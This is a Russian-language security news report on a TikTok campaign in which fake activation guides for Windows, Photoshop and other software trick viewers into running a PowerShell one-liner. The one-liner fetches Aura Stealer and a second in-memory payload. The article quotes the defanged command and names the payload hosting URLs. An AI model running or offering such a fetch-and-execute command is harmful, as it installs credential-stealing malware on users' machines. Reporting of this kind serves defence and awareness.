Киберпреступники распространяют вредоносное ПО, кражущее информацию, посредством кампании в TikTok, используя видеоролики, которые ложно выдают себя за бесплатные руководства по активации популярного программного обеспечения. Продолжающаяся операция, обнаруженная 19 октября 2025 года, использует метод социальной инженерии, чтобы обманом заставить пользователей заразить их собственные компьютеры. Обработчик ISC Ксавьер Мертенс сообщил о кампании, отметив ее сходство с операцией, которую Trend Micro наблюдала в мае. Видео TikTok содержат инструкции по активации законного программного обеспечения, такого как Windows, Microsoft 365, Adobe Premiere, Photoshop, CapCut Pro и Discord Nitro. Кампания также продвигает сфабрикованные услуги, в том числе «Netflix Premium» и «Spotify Premium», чтобы привлечь более широкую аудиторию. Техника атаки известна как атака ClickFix, которая включает в себя предоставление, казалось бы, полезных инструкций, которые обманом заставляют пользователей выполнять вредоносные команды. В видеороликах отображается короткая однострочная команда PowerShell, и зрителям предлагается выполнить ее с правами администратора. Показанный пример команды: iex (irm slmgr[.]win/photoshop). Имя конкретной программы в URL-адресе, например «фотошоп», изменяется в соответствии с программным обеспечением, олицетворяемым в видео. Когда пользователь выполняет эту команду, PowerShell подключается к удаленному сайту. slmgr[.]win. Это действие извлекает и запускает второй сценарий PowerShell, который затем загружает два исполняемых файла со страниц Cloudflare. Первый файл, скачанный с https://file-epq[.]pages[.]dev/updater.exeпредставляет собой вариант вредоносной программы Aura Stealer. Aura Stealer предназначен для сбора сохраненных учетных данных из веб-браузеров, файлов cookie аутентификации, криптовалютных кошельков и данных входа из других приложений. Эта украденная информация затем загружается злоумышленникам, предоставляя им доступ к учетным записям жертвы. Вторая полезная нагрузка, названная source.exeтакже загружается. Этот исполняемый файл используется для самокомпиляции кода с помощью встроенного компилятора Visual C# платформы .NET (csc.exe). Скомпилированный код впоследствии внедряется и запускается непосредственно в памяти. Конкретное назначение этой второй полезной нагрузки еще не определено. Пользователям, которые следовали инструкциям в этих видеороликах, следует считать, что все их учетные данные скомпрометированы, и им рекомендуется немедленно сбросить пароли для всех веб-сайтов и онлайн-сервисов, которые они используют. За последний год атаки ClickFix стали значительно более распространенными. Они используются для распространения различных штаммов вредоносного ПО в кампаниях, связанных с программами-вымогателями и кражей криптовалюты. В соответствии с общей практикой безопасности пользователи никогда не должны копировать текст с веб-сайта и выполнять его в диалоговом окне операционной системы, включая адресную строку Проводника, командную строку, PowerShell, терминал macOS или оболочки Linux.
Source: Видео TikTok распространяют Aura Stealer через поддельные руководства по программному обеспечению
